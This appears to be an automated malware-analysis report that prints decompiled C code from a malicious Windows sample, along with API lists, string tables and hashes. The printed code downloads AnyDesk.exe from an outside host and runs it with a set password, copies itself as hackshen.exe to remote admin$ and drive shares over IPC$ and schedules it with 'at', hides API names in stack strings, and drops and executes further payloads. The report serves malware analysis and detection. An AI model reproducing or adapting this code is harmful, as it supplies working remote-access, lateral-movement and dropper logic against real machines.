							 *((char*)(_t222 - 0x49)) = 0x6b;
							 *((char*)(_t222 - 0x48)) = 0x2e;
							 *((char*)(_t222 - 0x47)) = 0x65;
							 *((char*)(_t222 - 0x46)) = 0x78;
							 *((char*)(_t222 - 0x45)) = 0x65;
							 *((char*)(_t222 - 0x44)) = 0x20;
							 *((char*)(_t222 - 0x43)) = 0x2d;
							 *((char*)(_t222 - 0x42)) = 0x2d;
							 *((char*)(_t222 - 0x41)) = 0x73;
							 *((char*)(_t222 - 0x40)) = 0x65;
							 *((char*)(_t222 - 0x3f)) = 0x74;
							 *((char*)(_t222 - 0x3e)) = 0x2d;
							 *((char*)(_t222 - 0x3d)) = 0x70;
							 *((char*)(_t222 - 0x3c)) = 0x61;
							 *((char*)(_t222 - 0x3b)) = 0x73;
							 *((char*)(_t222 - 0x3a)) = 0x73;
							 *((char*)(_t222 - 0x39)) = 0x77;
							 *((char*)(_t222 - 0x38)) = 0x6f;
							 *((char*)(_t222 - 0x37)) = 0x72;
							 *((char*)(_t222 - 0x36)) = 0x64;
							 *((char*)(_t222 - 0x35)) = 0;
							_t134 = _t222 - 0x14; // 0x63
							ShellExecuteA(0, 0, _t134, _t222 - 0x78, 0, 0);
						}
					}
					 *(_t222 - 4) =  *(_t222 - 4) | 0xffffffff;
					L1001580C();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t222 - 0xc));
				return 0;
			}

0x1000728a
0x100072a5
0x100072a6
0x100072b2
0x100072b3
0x100072c5
0x100072d8
0x100072dd
0x100072ef
0x100075c5
0x100075c8
0x100075c9
0x100075ce
0x100075d3
0x100075da
0x100075e9
0x100075ec
0x100075ed
0x100075f2
0x100075f9
0x10007606
0x100072f5
0x100072f5
0x100072fc
0x10007302
0x10007307
0x1000730d
0x10007316
0x1000731b
0x10007323
0x1000732c
0x10007336
0x10007346
0x10007357
0x10007362
0x10007366
0x1000736f
0x10007373
0x10007377
0x1000737b
0x1000737f
0x10007383
0x10007387
0x1000738b
0x1000738f
0x10007392
0x10007396
0x1000739a
0x1000739e
0x100073a2
0x100073a6
0x100073aa
0x100073ae
0x100073b2
0x100073b6
0x100073ba
0x100073be
0x100073c2
0x100073c6
0x100073ca
0x100073ce
0x100073d2
0x100073d6
0x100073da
0x100073e4
0x100073f7
0x10007409
0x10007416
0x10007417
0x10007418
0x1000741f
0x10007420
0x10007425
0x10007453
0x10007468
0x10007474
0x10007478
0x1000747c
0x10007480
0x10007484
0x10007488
0x1000748c
0x10007490
0x10007493
0x10007497
0x1000749b
0x1000749f
0x100074a3
0x100074a7
0x100074ab
0x100074af
0x100074b3
0x100074b7
0x100074bb
0x100074bf
0x100074c3
0x100074c7
0x100074cb
0x100074cf
0x100074d3
0x100074d7
0x100074db
0x100074df
0x100074e3
0x100074e7
0x100074eb
0x100074ef
0x100074f3
0x100074f7
0x100074fb
0x100074ff
0x10007503
0x10007507
0x1000750b
0x1000750f
0x10007513
0x10007517
0x1000751b
0x1000751f
0x10007523
0x10007527
0x1000752b
0x1000752f
0x10007533
0x10007537
0x1000753b
0x1000753f
0x10007543
0x10007547
0x1000754b
0x1000754f
0x10007553
0x10007557
0x1000755b
0x1000755f
0x10007563
0x10007567
0x1000756b
0x1000756f
0x10007573
0x10007577
0x1000757b
0x1000757f
0x10007583
0x10007587
0x1000758b
0x1000758f
0x10007593
0x10007597
0x1000759b
0x1000759f
0x100075a2
0x100075a8
0x100075a8
0x10007468
0x100075ae
0x100075b5
0x100075b5
0x10007613
0x1000761c

APIs

__EH_prolog.LIBCMT ref: 1000728A
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002E,00000000), ref: 100072B3
strcat.MSVCRT(?,100245DC), ref: 100072C5
strcat.MSVCRT(?,?,?,100245DC), ref: 100072D8
PathFileExistsA.SHLWAPI(?), ref: 100072E7
#537.MFC42(SVP7.NET,00000012), ref: 10007323

Part of subcall function 10006C44: __EH_prolog.LIBCMT ref: 10006C49
Part of subcall function 10006C44: WSAStartup.WS2_32(00000202,?), ref: 10006C6B
Part of subcall function 10006C44: gethostbyname.WS2_32(00000000), ref: 10006C7A
Part of subcall function 10006C44: inet_ntoa.WS2_32(?), ref: 10006C87
Part of subcall function 10006C44: #537.MFC42(00000000), ref: 10006C91
Part of subcall function 10006C44: #800.MFC42(00000000), ref: 10006CA0

strcat.MSVCRT(?,00000000,00000012), ref: 10007346
strcat.MSVCRT(?,:9874/AnyDesk.exe,?,00000000,00000012), ref: 10007357
LoadLibraryA.KERNEL32(00000075,?,?,?,?,00000012), ref: 100073DD
GetProcAddress.KERNEL32(00000000), ref: 100073E4
SHGetSpecialFolderPathA.SHELL32(00000000,?,0000002E,00000000,?,?,?,00000012), ref: 100073F7
strcat.MSVCRT(?,\AnyDesk.exe,?,?,?,00000012), ref: 10007409
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000005), ref: 10007438
Sleep.KERNEL32(00000BB8,?,?,?,00000012), ref: 10007453

Part of subcall function 10004A35: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10004A43
Part of subcall function 10004A35: Process32First.KERNEL32(00000000,?), ref: 10004A61
Part of subcall function 10004A35: strcmp.MSVCRT ref: 10004A74
Part of subcall function 10004A35: Process32Next.KERNEL32 ref: 10004A87

ShellExecuteA.SHELL32(00000000,00000000,cmd.exe,?,00000000,00000000), ref: 100075A8
#800.MFC42(?,?,?,00000012), ref: 100075B5
#537.MFC42(?), ref: 100075C9
Sleep.KERNEL32(000003E8), ref: 100075DA
#537.MFC42(?), ref: 100075ED
Sleep.KERNEL32(000003E8), ref: 100075F9
DeleteFileA.KERNEL32(?), ref: 10007606

Strings

\, xrefs: 10007533
y, xrefs: 1000753F
p, xrefs: 1000757F
s, xrefs: 10007587
R, xrefs: 10007396
i, xrefs: 10007503
\, xrefs: 100074EF
1, xrefs: 100074B3
e, xrefs: 100073D2
A, xrefs: 10007537
C, xrefs: 100074CF
s, xrefs: 100074DF
-, xrefs: 10007567
cmd.exe, xrefs: 100075A2, 100075A5
U, xrefs: 10007392
o, xrefs: 100073B2
3, xrefs: 100074BB
r, xrefs: 10007597
., xrefs: 10007553
o, xrefs: 100073A2
4, xrefs: 100074BF
e, xrefs: 10007573
6, xrefs: 100074C7
\, xrefs: 100074D7
s, xrefs: 1000756F
, xrefs: 100074AF
e, xrefs: 100074E3
n, xrefs: 100073AA
b, xrefs: 100074FB
k, xrefs: 1000754F
\AnyDesk.exe, xrefs: 10007403
-, xrefs: 1000757B
c, xrefs: 10007497
n, xrefs: 1000753B
\, xrefs: 1000750B
w, xrefs: 1000758F
2, xrefs: 100074B7
s, xrefs: 1000758B
/, xrefs: 10007493
o, xrefs: 10007593
:, xrefs: 100074D3
a, xrefs: 10007583
l, xrefs: 100073AE
AnyDesk.exe, xrefs: 10007298
D, xrefs: 1000750F
o, xrefs: 10007513
e, xrefs: 10007547
e, xrefs: 10007557
a, xrefs: 100073B6
w, xrefs: 100073A6
c, xrefs: 100074A3
h, xrefs: 100074A7
s, xrefs: 1000754B
P, xrefs: 100074F3
l, xrefs: 100073CE
o, xrefs: 100073C2
A, xrefs: 100073D6
u, xrefs: 100074F7
x, xrefs: 1000755B
t, xrefs: 1000752B
, xrefs: 1000749B
u, xrefs: 1000751B
L, xrefs: 1000739A
r, xrefs: 100074E7
s, xrefs: 100074EB
i, xrefs: 100073CA
:9874/AnyDesk.exe, xrefs: 10007351
t, xrefs: 10007577
c, xrefs: 10007507
F, xrefs: 100073C6
U, xrefs: 100074DB
s, xrefs: 1000752F
, xrefs: 10007563
5, xrefs: 100074C3
|, xrefs: 100074CB
SVP7.NET, xrefs: 1000731E
c, xrefs: 10007517
D, xrefs: 1000739E
http://, xrefs: 100072F5
T, xrefs: 100073BE
l, xrefs: 100074FF
e, xrefs: 1000755F
d, xrefs: 1000759B
m, xrefs: 1000751F
n, xrefs: 10007527
o, xrefs: 100074AB
e, xrefs: 10007523
d, xrefs: 100073BA
urlmon.dll, xrefs: 1000736B
e, xrefs: 1000749F
-, xrefs: 1000756B
D, xrefs: 10007543

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: strcat$#537$PathSleep$#800ExecuteFileFolderH_prologProcess32ShellSpecial$AddressCreateDeleteExistsFirstLibraryLoadNextProcSnapshotStartupToolhelp32gethostbynameinet_ntoastrcmp
String ID: $ $ $-$-$-$.$/$1$2$3$4$5$6$:$:9874/AnyDesk.exe$A$A$AnyDesk.exe$C$D$D$D$F$L$P$R$SVP7.NET$T$U$U$\$\$\$\$\AnyDesk.exe$a$a$b$c$c$c$c$cmd.exe$d$d$e$e$e$e$e$e$e$e$h$http://$i$i$k$l$l$l$m$n$n$n$o$o$o$o$o$o$p$r$r$s$s$s$s$s$s$s$t$t$u$u$urlmon.dll$w$w$x$y$|
API String ID: 921729620-296999252
Opcode ID: 9fb7c1cab9d3c12ded321334e88d3d4ef167bff28846d2affe3d336c3cb2fb8b
Instruction ID: 99c222d900de6c922e71fe632431ff246417a9293721317b8afeea1f70cae55e
Opcode Fuzzy Hash: 9fb7c1cab9d3c12ded321334e88d3d4ef167bff28846d2affe3d336c3cb2fb8b
Instruction Fuzzy Hash: D4C10F60C082D8DDFB12C7E8D849BDEBFB95F16348F084099E5847B282C7BA5658C776

Uniqueness

Uniqueness Score: -1.00%

Function 10007E0B, Relevance: 86.0, APIs: 32, Strings: 17, Instructions: 235
stringfilesleepCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E10007E0B(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				_Unknown_base(*)()* _v8;
				int _v12;
				int _v16;
				CHAR* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				int _v32;
				int _v36;
				char _v40;
				void* _v59;
				char _v60;
				struct _SYSTEMTIME _v76;
				void _v335;
				char _v336;
				void _v1363;
				char _v1364;
				intOrPtr _t149;
				void* _t152;
				void* _t153;
				void* _t156;
				void* _t157;

				_v8 = GetProcAddress(LoadLibraryA("mpr.dll"), "WNetAddConnection2A");
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				memset( &_v60, 0, 0x14);
				_t153 = _t152 + 0xc;
				if(lstrcmpA(_a12, "NULL") == 0) {
					wsprintfA( &_v60, "\"%s\"", 0x10027118);
					_t153 = _t153 + 0xc;
				}
				_v1364 = 0;
				memset( &_v1363, 0, 0x100 << 2);
				asm("stosw");
				asm("stosb");
				_v336 = 0;
				memset( &_v335, 0, 0 << 2);
				asm("stosw");
				asm("stosb");
				wsprintfA( &_v1364, "\\\\%s\\ipc$", _a4);
				_t156 = _t153 + 0x24;
				_v20 =  &_v1364;
				_v40 = 2;
				_t149 = 1;
				_v36 = 0;
				_v32 = 0;
				_v28 = _t149;
				_v24 = 0x1002711c;
				_v12 = 0;
				_v16 = 0;
				_v8( &_v40, _a12, _a8, 0, 0x40);
				if(_v8 == 0) {
					return _t149;
				} else {
					E10008106();
					Sleep(0xc8);
					memset( &_v1364, 0, 0x404);
					wsprintfA( &_v1364, "\\\\%s\\admin$\\hackshen.exe", _a4);
					_t157 = _t156 + 0x18;
					lstrcpyA( &_v336, "admin$\\");
					if(CopyFileA(E10008106(),  &_v1364, 0) != 0) {
						L8:
						GetLocalTime( &_v76);
						memset( &_v1364, 0, 0x404);
						wsprintfA( &_v1364, "at \\\\%s %d:%d %s", _a4, _v76.wHour & 0x0000ffff, (_v76.wMinute & 0x0000ffff) + 2,  &_v336);
						WinExec( &_v1364, 0);
						 *0x1002700c = 1;
						Sleep(0x7d0);
						L9:
						return 0;
					}
					memset( &_v1364, 0, 0x404);
					wsprintfA( &_v1364, "\\\\%s\\C$\\hackshen.exe", _a4);
					_t157 = _t157 + 0x18;
					lstrcpyA( &_v336, "C:\\hackshen.exe");
					if(CopyFileA(E10008106(),  &_v1364, 0) != 0) {
						goto L8;
					}
					memset( &_v1364, 0, 0x404);
					wsprintfA( &_v1364, "\\\\%s\\D$\\hackshen.exe", _a4);
					_t157 = _t157 + 0x18;
					lstrcpyA( &_v336, "D:\\hackshen.exe");
					if(CopyFileA(E10008106(),  &_v1364, 0) != 0) {
						goto L8;
					}
					memset( &_v1364, 0, 0x404);
					wsprintfA( &_v1364, "\\\\%s\\E$\\hackshen.exe", _a4);
					_t157 = _t157 + 0x18;
					lstrcpyA( &_v336, "E:\\hackshen.exe");
					if(CopyFileA(E10008106(),  &_v1364, 0) != 0) {
						goto L8;
					}
					memset( &_v1364, 0, 0x404);
					wsprintfA( &_v1364, "\\\\%s\\F$\\hackshen.exe", _a4);
					lstrcpyA( &_v336, "F:\\hackshen.exe");
					CopyFileA(E10008106(),  &_v1364, 0);
					goto L9;
				}
			}

0x10007e2e
0x10007e38
0x10007e3d
0x10007e3e
0x10007e3f
0x10007e40
0x10007e41
0x10007e43
0x10007e49
0x10007e4e
0x10007e67
0x10007e77
0x10007e79
0x10007e79
0x10007e89
0x10007e8f
0x10007e91
0x10007e93
0x10007e9f
0x10007ea8
0x10007eaa
0x10007eac
0x10007eb9
0x10007ebb
0x10007ec4
0x10007ecc
0x10007ed3
0x10007ed4
0x10007ed8
0x10007ede
0x10007ee1
0x10007ee8
0x10007eee
0x10007ef2
0x10007ef8
0x00000000
0x10007efe
0x10007efe
0x10007f08
0x10007f1c
0x10007f30
0x10007f32
0x10007f41
0x10007f5d
0x10008099
0x1000809d
0x100080ac
0x100080d3
0x100080e0
0x100080eb
0x100080f5
0x100080fb
0x00000000
0x100080fb
0x10007f6c
0x10007f80
0x10007f82
0x10007f91
0x10007fad
0x00000000
0x00000000
0x10007fbc
0x10007fd0
0x10007fd2
0x10007fe1
0x10007ffd
0x00000000
0x00000000
0x1000800c
0x10008020
0x10008022
0x10008031
0x1000804d
0x00000000
0x00000000
0x10008058
0x1000806c
0x1000807d
0x10008091
0x00000000
0x10008091

APIs

LoadLibraryA.KERNEL32(mpr.dll,administrator,10027114,00000000), ref: 10007E1C
GetProcAddress.KERNEL32(00000000,WNetAddConnection2A), ref: 10007E28
memset.MSVCRT ref: 10007E49
lstrcmpA.KERNEL32(10007DC5,NULL), ref: 10007E59
wsprintfA.USER32 ref: 10007E77
wsprintfA.USER32 ref: 10007EB9
Sleep.KERNEL32(000000C8), ref: 10007F08
memset.MSVCRT ref: 10007F1C
wsprintfA.USER32 ref: 10007F30
lstrcpyA.KERNEL32(?,admin$\), ref: 10007F41
CopyFileA.KERNEL32(00000000,?,00000000), ref: 10007F55
memset.MSVCRT ref: 10007F6C
wsprintfA.USER32 ref: 10007F80
lstrcpyA.KERNEL32(?,C:\hackshen.exe), ref: 10007F91
CopyFileA.KERNEL32(00000000,?,00000000), ref: 10007FA5
memset.MSVCRT ref: 10007FBC
wsprintfA.USER32 ref: 10007FD0
lstrcpyA.KERNEL32(?,D:\hackshen.exe), ref: 10007FE1

Part of subcall function 10008106: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000001), ref: 10008135

CopyFileA.KERNEL32(00000000,?,00000000), ref: 10007FF5
memset.MSVCRT ref: 1000800C
wsprintfA.USER32 ref: 10008020
lstrcpyA.KERNEL32(?,E:\hackshen.exe), ref: 10008031
CopyFileA.KERNEL32(00000000,?,00000000), ref: 10008045
memset.MSVCRT ref: 10008058
wsprintfA.USER32 ref: 1000806C
lstrcpyA.KERNEL32(?,F:\hackshen.exe), ref: 1000807D
CopyFileA.KERNEL32(00000000,?,00000000), ref: 10008091
GetLocalTime.KERNEL32(?), ref: 1000809D
memset.MSVCRT ref: 100080AC
wsprintfA.USER32 ref: 100080D3
WinExec.KERNEL32 ref: 100080E0
Sleep.KERNEL32(000007D0), ref: 100080F5

Strings

administrator, xrefs: 10007E16
E:\hackshen.exe, xrefs: 1000802B
C:\hackshen.exe, xrefs: 10007F8B
\\%s\ipc$, xrefs: 10007EB3
mpr.dll, xrefs: 10007E17
\\%s\F$\hackshen.exe, xrefs: 10008066
at \\%s %d:%d %s, xrefs: 100080CD
WNetAddConnection2A, xrefs: 10007E22
admin$\, xrefs: 10007F3B
\\%s\C$\hackshen.exe, xrefs: 10007F7A
\\%s\D$\hackshen.exe, xrefs: 10007FCA
\\%s\E$\hackshen.exe, xrefs: 1000801A
\\%s\admin$\hackshen.exe, xrefs: 10007F2A
D:\hackshen.exe, xrefs: 10007FDB
"%s", xrefs: 10007E71
NULL, xrefs: 10007E51
F:\hackshen.exe, xrefs: 10008077

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: wsprintf$memset$File$Copylstrcpy$Sleep$AddressExecLibraryLoadLocalModuleNameProcTimelstrcmp
String ID: "%s"$C:\hackshen.exe$D:\hackshen.exe$E:\hackshen.exe$F:\hackshen.exe$NULL$WNetAddConnection2A$\\%s\C$\hackshen.exe$\\%s\D$\hackshen.exe$\\%s\E$\hackshen.exe$\\%s\F$\hackshen.exe$\\%s\admin$\hackshen.exe$\\%s\ipc$$admin$\$administrator$at \\%s %d:%d %s$mpr.dll
API String ID: 4105847455-2266634704
Opcode ID: a197cad782eeb51f4cf5dadb945c64b7b63b7dccd281897ff4755c36332c7a1e
Instruction ID: 570a58f1698385f975524b0e4befcb83bb1aff50d555695e543758ab97cc28a7
Opcode Fuzzy Hash: a197cad782eeb51f4cf5dadb945c64b7b63b7dccd281897ff4755c36332c7a1e
Instruction Fuzzy Hash: CE81E6B5800A5DBADB20DBE4DC98DDF7B7CFB08346F4544A5F609E6150EB349A888F60

Uniqueness

Uniqueness Score: -1.00%

Function 004038B0, Relevance: 84.2, APIs: 8, Strings: 40, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E004038B0(intOrPtr* __edi, void* __ebp) {
				signed int _v4;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				void* _v76;
				void* __ebx;
				void* __esi;
				signed int _t88;
				_Unknown_base(*)()* _t94;
				_Unknown_base(*)()* _t97;
				_Unknown_base(*)()* _t101;
				intOrPtr* _t108;
				intOrPtr _t111;
				void* _t113;
				intOrPtr _t118;
				intOrPtr _t124;
				intOrPtr* _t127;
				void* _t131;
				void* _t132;
				signed int _t134;

				_t131 = __ebp;
				_t127 = __edi;
				_t134 =  &_v76;
				_t88 =  *0x44f5d0; // 0x8e7de579
				_t89 = _t88 ^ _t134;
				_v4 = _t88 ^ _t134;
				_t128 = 0;
				if(__edi != 0) {
					if( *((intOrPtr*)(__edi + 0x10)) != 0) {
						_t111 =  *((intOrPtr*)(__edi + 4));
						_push(0);
						_push(0);
						_push(_t111);
						 *((intOrPtr*)( *((intOrPtr*)( *__edi + 0x28)) + _t111))();
						 *((intOrPtr*)(__edi + 0x10)) = 0;
					}
					_push(_t113);
					_v71 = 0x45;
					_v68 = 0x45;
					_push(_t131);
					_t132 = GetProcAddress;
					_v72 = 0x4b;
					_v70 = 0x52;
					_v69 = 0x4e;
					_v67 = 0x4c;
					_v66 = 0x33;
					_v65 = 0x32;
					_v64 = 0x2e;
					_v63 = 0x64;
					_v62 = 0x6c;
					_v61 = 0x6c;
					_v60 = 0;
					if( *((intOrPtr*)(_t127 + 8)) != _t128) {
						_v40 = 0x4c;
						_v44 = 0x46;
						_v43 = 0x72;
						_v42 = 0x65;
						_v41 = 0x65;
						_v39 = 0x69;
						_v38 = 0x62;
						_v37 = 0x72;
						_v36 = 0x61;
						_v35 = 0x72;
						_v34 = 0x79;
						_v33 = 0;
						_v76 = GetProcAddress(LoadLibraryA( &_v72),  &_v44);
						if( *((intOrPtr*)(_t127 + 0xc)) > _t128) {
							do {
								_t124 =  *((intOrPtr*)(_t127 + 8));
								_t108 = _t124 + _t128 * 4;
								if( *((intOrPtr*)(_t124 + _t128 * 4)) != 0xffffffff) {
									_v76( *_t108);
								}
								_t128 = _t128 + 1;
							} while (_t128 <  *((intOrPtr*)(_t127 + 0xc)));
						}
						E00402EB0( *((intOrPtr*)(_t127 + 8)), _t132);
					}
					_v32 = 0x56;
					_v31 = 0x69;
					_v30 = 0x72;
					_v29 = 0x74;
					_v28 = 0x75;
					_v27 = 0x61;
					_v26 = 0x6c;
					_v25 = 0x46;
					_v24 = 0x72;
					_v23 = 0x65;
					_v22 = 0x65;
					_v21 = 0;
					_t94 = GetProcAddress(LoadLibraryA( &_v72),  &_v32);
					_t118 =  *((intOrPtr*)(_t127 + 4));
					if(_t118 != 0) {
						 *_t94(_t118, 0, 0x8000);
					}
					_v56 = 0x48;
					_v55 = 0x65;
					_v54 = 0x61;
					_v53 = 0x70;
					_v52 = 0x46;
					_v51 = 0x72;
					_v50 = 0x65;
					_v49 = 0x65;
					_v48 = 0;
					_t97 = GetProcAddress(LoadLibraryA( &_v72),  &_v56);
					_t128 = _t97;
					_t122 =  &_v20;
					_v12 = 0x73;
					_v11 = 0x73;
					_v20 = 0x47;
					_v19 = 0x65;
					_v18 = 0x74;
					_v17 = 0x50;
					_v16 = 0x72;
					_v15 = 0x6f;
					_v14 = 0x63;
					_v13 = 0x65;
					_v10 = 0x48;
					_v9 = 0x65;
					_v8 = 0x61;
					_v7 = 0x70;
					_v6 = 0;
					_t101 = GetProcAddress(LoadLibraryA( &_v72),  &_v20);
					_t89 =  *_t97( *_t101(0, _t127));
					_pop(_t113);
				}
				return E0042569C(_t89, _t113, _v4 ^ _t134, _t122, _t127, _t128);
			}

APIs

LoadLibraryA.KERNEL32 ref: 00403974
GetProcAddress.KERNEL32(00000000), ref: 0040397B
LoadLibraryA.KERNEL32 ref: 004039F3
GetProcAddress.KERNEL32(00000000), ref: 004039F6
LoadLibraryA.KERNEL32(?,?), ref: 00403A3D
GetProcAddress.KERNEL32(00000000), ref: 00403A40
LoadLibraryA.KERNEL32 ref: 00403A96
GetProcAddress.KERNEL32(00000000), ref: 00403A9D

Strings

p, xrefs: 00403A21
F, xrefs: 00403A26
d, xrefs: 00403919
r, xrefs: 0040395B
o, xrefs: 00403A70
p, xrefs: 00403A8C
i, xrefs: 00403951
V, xrefs: 004039B9
H, xrefs: 00403A13
i, xrefs: 004039BE
b, xrefs: 00403956
F, xrefs: 004039DC
2, xrefs: 0040390F
a, xrefs: 00403A1C
r, xrefs: 004039C3
l, xrefs: 00403923
., xrefs: 00403914
t, xrefs: 004039C8
3, xrefs: 0040390A
F, xrefs: 0040393F
c, xrefs: 00403A75
r, xrefs: 00403A2B
K, xrefs: 004038F7
r, xrefs: 004039E1
H, xrefs: 00403A7E
r, xrefs: 00403A6B
r, xrefs: 00403944
P, xrefs: 00403A66
N, xrefs: 00403901
r, xrefs: 00403965
u, xrefs: 004039CD
t, xrefs: 00403A61
l, xrefs: 0040391E
a, xrefs: 004039D2
l, xrefs: 004039D7
G, xrefs: 00403A58
y, xrefs: 0040396A
a, xrefs: 00403960
R, xrefs: 004038FC
a, xrefs: 00403A87

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: .$2$3$F$F$F$G$H$H$K$N$P$R$V$a$a$a$a$b$c$d$i$i$l$l$l$o$p$p$r$r$r$r$r$r$r$t$t$u$y
API String ID: 2574300362-2346325977
Opcode ID: 6d77b60b7dc64c3754b119bb8a5fdd21edddc3c74b34c997db90a06b5291abc3
Instruction ID: 51cf9c5e07e4b655dca4e8132765ca20b78b33567c0a5749840054a9a1867ab4
Opcode Fuzzy Hash: 6d77b60b7dc64c3754b119bb8a5fdd21edddc3c74b34c997db90a06b5291abc3
Instruction Fuzzy Hash: 5B61176140C3C0DAD312CB68844874BFFE56BA6748F48499EF1D857282C7BAD658C7BB

Uniqueness

Uniqueness Score: -1.00%

Function 100068EF, Relevance: 79.0, APIs: 37, Strings: 8, Instructions: 265
filestringsleepCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E100068EF() {
				int _t105;
				signed int _t115;
				int _t119;
				char _t120;
				intOrPtr _t121;
				int _t126;
				int _t128;
				int _t130;
				int _t139;
				int _t141;
				void* _t142;
				void* _t146;
				signed int _t152;
				void* _t168;
				void* _t172;
				void* _t175;
				void* _t178;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t187;
				void* _t188;
				void* _t189;

				E100158AC(E1001A3D8, _t180);
				_t183 = _t182 - 0x944;
				 *0x100273bc(0, _t180 - 0x438, 7, 0, _t168, _t175, _t146);
				strcat(_t180 - 0x438, 0x10024458);
				if(PathFileExistsA(_t180 - 0x438) == 0) {
					E10006784();
					_t152 = 0x40;
					 *(_t180 - 0x12c) = 0;
					memset(_t180 - 0x12b, 0, _t152 << 2);
					asm("stosw");
					asm("stosb");
					_t172 =  *(_t180 + 8);
					memcpy(_t180 - 0x950, _t172, 0x20c);
					 *0x100273bc(0, _t180 - 0x12c, 0x1a, 0);
					PathAddBackslashA(_t180 - 0x12c);
					wsprintfA(_t180 - 0x334, _t180 - 0x12c);
					wsprintfA(_t180 - 0x53c, _t180 - 0x12c);
					wsprintfA(_t180 - 0x640, _t180 - 0x12c);
					strcat(_t180 - 0x12c, _t180 - 0x844);
					_t187 = _t183 + 0x38;
					_t178 = CreateFileA(_t180 - 0x12c, 0x40000000, 1, 0, 2, 0, 0);
					if(_t178 == 0xffffffff || WriteFile(_t178, _t172 + 0x20c,  *(_t180 + 0xc) + 0xfffffdf4, _t180 - 0x24, 0) == 0) {
						goto L3;
					} else {
						CloseHandle(_t178);
						GetModuleFileNameA(0, _t180 - 0x744, 0x104);
						 *0x100273bc(0, _t180 - 0x230, 0x2e, 0);
						__eflags = PathFileExistsA(_t180 - 0x12c);
						if(__eflags != 0) {
							_push(0);
							 *(_t180 + 8) = _t187;
							_push(0x10027110);
							L10015818();
							_push(_t187);
							 *(_t180 + 0xc) = _t187;
							_push(_t180 - 0x334);
							 *(_t180 - 4) = 0;
							L10015818();
							_push(_t187);
							 *(_t180 - 0x28) = _t187;
							_push(_t180 - 0x12c);
							 *(_t180 - 4) = 1;
							L10015818();
							 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
							_t105 = E10006355(__eflags);
							_t188 = _t187 + 0xc;
							__eflags = _t105;
							if(_t105 != 0) {
								DeleteFileA(_t180 - 0x12c);
								strcat(_t180 - 0x334, "\\1200.exe");
								strcat(_t180 - 0x53c, "\\d.rar");
								strcat(_t180 - 0x640, "\\run.exe");
								_t189 = _t188 + 0x18;
								_t115 = ShellExecuteA(0, 0, _t180 - 0x334, 0, 0, 0);
								asm("sbb eax, eax");
								__eflags =  ~_t115 + 1 - 0x20;
								if( ~_t115 + 1 <= 0x20) {
									while(1) {
										L7:
										_t119 = PathFileExistsA(_t180 - 0x438);
										__eflags = _t119;
										if(_t119 == 0) {
											continue;
										}
										L8:
										_t120 = "run.exe"; // 0x2e6e7572
										 *(_t180 - 0x14) = _t120;
										asm("movsd");
										_t121 =  *0x100244a8; // 0x657865
										asm("movsd");
										asm("movsb");
										 *((intOrPtr*)(_t180 - 0x10)) = _t121;
										Sleep(0xbb8);
										strcat(_t180 - 0x230, "\\SVIP7.exe");
										_t126 = CopyFileA(_t180 - 0x744, _t180 - 0x230, 0);
										__eflags = _t126;
										if(_t126 != 0) {
											PathRemoveFileSpecA(_t180 - 0x230);
										}
										_t128 = E10004A35(_t180 - 0x20);
										__eflags = _t128;
										_pop(_t159);
										if(_t128 != 0) {
											_t142 = _t180 - 0x20;
											 *(_t180 + 8) = _t189;
											L14:
											_push(_t142);
											L10015818();
											E1000490A();
											continue;
											do {
												do {
													do {
														goto L7;
													} while (_t119 == 0);
													goto L8;
													L15:
													strcat(_t180 - 0x230, "\\1234");
													_pop(_t162);
													DeleteFileA("C:\\ProgramData\\jy.lnk");
													 *(_t180 + 8) = _t189;
													_push(_t180 - 0x230);
													L10015818();
													E10006687();
													DeleteFileA(_t180 - 0x53c);
